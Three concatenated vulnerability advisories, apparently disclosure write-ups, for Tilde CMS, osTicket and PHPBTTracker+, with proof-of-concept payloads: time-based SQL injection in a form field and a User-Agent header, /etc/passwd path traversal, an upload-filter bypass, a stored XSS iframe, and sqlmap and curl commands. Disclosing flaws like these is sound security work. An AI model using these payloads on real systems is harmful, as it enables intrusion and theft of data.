# Authors: Paolo Forte, Raffaele Forte
# Vendor Homepage: http://www.tildenetwork.com
# Version: Tilde CMS v1.0.1
# Tested on: Ubuntu 12.04, PHP 5.3.10

I. INTRODUCTION
Tilde CMS is closed-source content management system created by tildenetwork.com

II. DESCRIPTION
The web application suffers of multiple vulnerabilities.

1. SQL Injection (CVE-2017-11324)

Due to missing escaping of the backtick character, the following query in the source code is vulnerable:

[class.SystemAction.php]

$SQL_string = "SELECT * FROM `form_table_".$id_form."` WHERE ID='$idForm'";
$SQL_oldData = @mysql_query($SQL_string,$this->DB_conn);

The vulnerability can be trigged via a POST request as shown in the following PoC:

POST /actionphp/action.input.php HTTP/1.1
ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1` WHERE SLEEP(5)-- aaa &idForm=1234567890

The resulting query on the server-side will be:

SELECT * FROM `form_table_1` WHERE SLEEP(5)-- aaa ` WHERE ID='1234567890'

For a succesful exploitation, the table “form_table_1” must be valid.

2. Path Traversal (CVE-2017-11325)

The vulnerabilty exists on this method:

GET /actionphp/download.File.php?&file=../../../../../../etc/passwd

3. Arbitrary Files Upload (CVE-2017-11326)

It is possible to bypass the implemented restrictions shown in the following snippet of the code:

$file=$_FILES['file'.$i]['tmp_name'];
if (($file!="")&&($file!="none")) {
    $source_file=$file;
    $file_name=$_FILES['file'.$i]['name'];
    $file_name=str_replace(".php",".txt",$file_name);
    $file_name=str_replace(" ","_",$file_name);
    $file_name=str_replace("+","",$file_name);

A file named “filename.+php” will be renamed in “filename.php”, therefore successfully uploaded.

4. Insecure Direct Object References (CVE-2017-11327)

It is possible to retrieve sensitive resources by using direct references.
A low privileged user can load the PHP resources such as:

    admin/content.php
    admin/content.php?method=ftp_upload

IV. BUSINESS IMPACT
These flaws may compromise the integrity of the system and/or expose sensitive information.

V. SYSTEMS AFFECTED
Tilde CMS v1.01 is vulnerable (probably all previous versions)

VI. VULNERABILITY HISTORY
July 6th, 2017: Vulnerability identification
July 7th, 2017: Vendor notification
July 13th, 2017: CVE-ID reserved

VII. LEGAL NOTICES
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuseof this information.

# Authors: Giovanni Cerrato, Enrico Cinquini
# Vendor Homepage: http://osticket.com/
# Version: osTicket v.1.9.12

 

I. INTRODUCTION

Last version of osTicket (v1.9.12) is affected by multiple vulnerabilities.

 

II. DESCRIPTION

The web application suffers of multiple vulnerabilities.

1. Upload HTML file

It is possible to upload files attached to a ticket at URL:
https://hostname/upload/open.php

There are some controls to block not allowed file (e.g php,html) but they are only client-side and not server-side so they can be easily bypassed using tool like Burp suite.They will be uploaded and reachable at specific URL like the following example:
https://hostname/file.php?key=qycj1msethqx49ilidrwxrurvebbsipa&expires=1447372800&signature=6ee71ea7dee17cac30a884f4cf823c6734e1115d

This vulnerability could be used for example to perform XSS attack or to upload a fake login page.

2. Missing funcition level access control

It is possible to access to some contents of the web application without authentication. It is allowed to view all ticket attachment only by calling their URLs like following:
https://hostname/file.php?key=qycj1msethqx49ilidrwxrurvebbsipa&expires=1447372800&signature=6ee71ea7dee17cac30a884f4cf823c6734e1115d

This vulnerability combined with unrestricted HTML upload can be used to realize phishing and/or XSS attack via email. To achieve this tasks anyone needs to upload an HTML file containing malicious Javascript or phishing page and then spread the associated URL.

3. Stored Cross Site Scripting

The application is vulnerable to some stored XSS attack.

URL: https://hostname/scp/users.php
Functionality: Add User
Form parameter affected: Internal Notes

URL: https://hostname/scp/orgs.php
Functionality: Add Organization
Form parameter affected: Name, Internal Notes

URL https://hostname/scp/categories.php
Functionality: Add New Category
Form parameter affected: Category Description, Internal Notes

URL https://hostname/scp/departments.php
Functionality: Add New Department
Form parameter affected: Department Signature

URL: https://hostname/scp/teams.php
Functionality: Add New Team
Form parameter affected: Admin Notes, Name

URL: https://hostname/scp/groups.php
Functionality: Add New Group
Form parameter affected: Admin Notes

URL: https://hostname/scp/banlist.php
Functionality: Ban New Email
Form parameter affected: Admin Notes

URL: https://hostname/scp/profile.php
Functionality: Edit profile
Form parameter affected: Signature

A proof of concept can be obtained using the following Javascript code:
<IFRAME onload=alert(1);></IFRAME>

4. Session fixation

The application does not regenerate session id cookie (OSTSESESSID) after authentication so it is prone to session fixation attack. This vulnerability can be used to hijack a valid user session.

 

III. BUSINESS IMPACT

An attacker could upload malicious file, hijack a valid user session, perform XSS or phishing attacks and access to sensible information.

 

IV. SYSTEMS AFFECTED

Version 1.9.12 is vulnerable.

 

V. SOLUTION

It’s necessary to:

• implement a strong upload filter to prevent the upload of malicious file
• implement an input validation mechanism to avoid being vulnerable to XSS injection
• review and correct access control to prevent that unauthenticated users can access to sensible documents

 

VI. ADVISORY TIMELINE

November 10th, 2015: Vulnerability identification
November 17th, 2015: First contact with vendor
November 19th, 2015: Vendor notified
November 25th, 2015: Asking for status update
November 30th, 2015: Vendor response; investigating
December 16th, 2015: Asking for status update
December 18th, 2015: Vendor says that the vulnerabilities will be fixed in the new version
January 11th, 2016: Provided more details to vendor
January 25th, 2016: Asking for status update
February 02th, 2016: Advised vendor public disclosure date will be February 04th
February 02th, 2016: Vendor provides status update(still investigating)
February 04th, 2016: Public disclosure

 

VII. LEGAL NOTICES

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.

# Exploit Author: BackBox Team
# Vendor Homepage: http://phpbttrkplus.sourceforge.net/
# Software Link: http://sourceforge.net/projects/phpbttrkplus/files/
# Version: PHPBTTracker+ v2.2
# Tested on: PHP 5.4.27, Apache 2.4.9, MySQL >= 5.0.0

 

I. INTRODUCTION

SQL Injection through User-Agent.

User agent is an HTTP header section provided by application used by the original client. This is used for statistical purposes and the protocol violation tracing. The first white space delimited word must include the product name with an optional slash and version number.

User agent injection is a critical issue for web applications. In this specific case it’s worthed to do an investigation on the header section of user-agent to see if there is any malformation that will allow an SQLi.

Example:

GET /tracker.php
User-Agent: Transmission/2.51' OR (SLEEP(20)) AND 'aaaa'='aaaa
Host: [host]
Accept: */*
Accept-Encoding: gzip;q=1.0, deflate, identity

 

II. BACKGROUND

BitTorrent tracker protocol is used by clients to request the IP addresses of other peers associated with a torrent, and to exchange the client’s transfer statistics. Clients connect to a centralized server, known as a *tracker*, which stores their IP addresses and responds with the IP addresses of other clients (also known as *peers*). The tracker has no knowledge about the association of the nodes and their pieces (it functions only as bridge between clients).

The standard tracker protocol is based on HTTP, with request data encoded as query parameters (as used by HTML forms) and response data BEncoded.

Query parameters must be encoded according to the rules for HTML form submissions through HTTP GET: ‘reserved character’ bytes are encoded in hexadecimal as %HH, and space is encoded as “+”; names and values are joined with “=” and the pairs joined with “&”.

The tracker’s URL announce is obtained from the announce entry of the root dictionary of the torrent metadata file.

Clients announce themselves by sending a GET request to the tracker’s URL announce with “?” and the following parameters (encoded as above) appended:

info_hash
The 20 byte sha1 hash of the bencoded form of the info value from the metainfo file. Note that this is a substring of the metainfo file. Don’t forget to URL-encode this.

peer_id
A string of length 20 which the downloader uses as its id. Each downloader generates its own id at random at the start of a new download. Don’t forget to URL-encode this.

port
Port number that the peer is listening on. Common behavior is for a downloader to try to listen on port 6881 and if that port is taken try 6882, then 6883, etc. and give up after 6889.

uploaded
Total amount uploaded so far, represented in base ten in ASCII.

downloaded
Total amount downloaded so far, represented in base ten in ASCII.

left
Number of bytes that a specific client still has to download, represented in base ten in ASCII. Note that this can’t be computed from downloaded and the file length since the client might be resuming an earlier download, and there is a chance that some of the downloaded data failed an integrity check and had to be re-downloaded.

event
Optional key which maps to started, completed, or stopped (or empty, which is the same as not being present). If not present, this is one of the announcements done at regular intervals. An announcement using started is sent when a download first begins, and one using completed is sent when the download is complete. No completed is
sent if the file was complete when started. Downloaders should send an announcement using ‘stopped’ when they cease downloading, if they can.

Example:

http://hostname/announce
?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4
&peer_id=
&port=51413
&uploaded=0
&downloaded=0
&left=0
&event=started

 

III. DESCRIPTION

In order to exploit the vulnerability the torrent has to be managed by the tracker. First we need to extract the GET request, and parse out the parameter “info_hash”, a proxy or a traffic sniffer like Wireshark can help us to do that.

Example:

GET /phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started HTTP/1.1
User-Agent: Transmission/2.51
Host: hostname
Accept: */*
Accept-Encoding: gzip;q=1.0, deflate, identity

Then it’s possible to inject SQL commands inside the User-Agent field.

 

IV. PROOF OF CONCEPT

Is it possible to verify the vulnerability by using, for example, sqlmap or curl…

* Using SQLMap

raffaele@backbox:~$ sqlmap -u "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -o --level 3 -p user-agent

User-Agent parameter 'User-Agent' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 318 HTTP(s) requests:

Place: User-Agent
Parameter: User-Agent
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: sqlmap/1.0-dev-0f581cc (http://sqlmap.org)" RLIKE (SELECT (CASE WHEN (6960=6960) THEN 0x73716c6d61702f312e302d6465762d306635383163632028687474703a2f2f73716c6d61702e6f726729 ELSE 0x28 END)) AND "mhBW"="mhBW

* Using curl

raffaele@backbox:~$ curl "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -A 'asd" OR (SLEEP(15)) AND "'
[...]
d8:intervali1800e12:min intervali300e5:peersld2:ip9:127.0.0.17:peer id20:4:porti51413eed2:ip9:127.0.0.17:peer id20:04:porti51413eee10:tracker id4:1131e

 

V. BUSINESS IMPACT

An attacker could execute arbitrary SQL queries on the vulnerable system. This may compromise the integrity of database and/or expose sensitive information.

 

VI. SYSTEMS AFFECTED

PHPBTTracker+ Version 2.2 is vulnerable (probably v2.x and RivetTracker v1.x too)

 

VII. REFERENCES

• http://resources.infosecinstitute.com/sql-injection-http-headers
• https://wiki.theory.org/BitTorrent_Tracker_Protocol

 

VIII. CREDITS

The vulnerability has been discovered by BackBox Linux Team

 

IX. VULNERABILITY HISTORY

May 13th, 2014: Vulnerability identification
May ??th, 2014: Vendor notification
May ??th, 2014: Vulnerability disclosure

 

X. LEGAL NOTICES

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.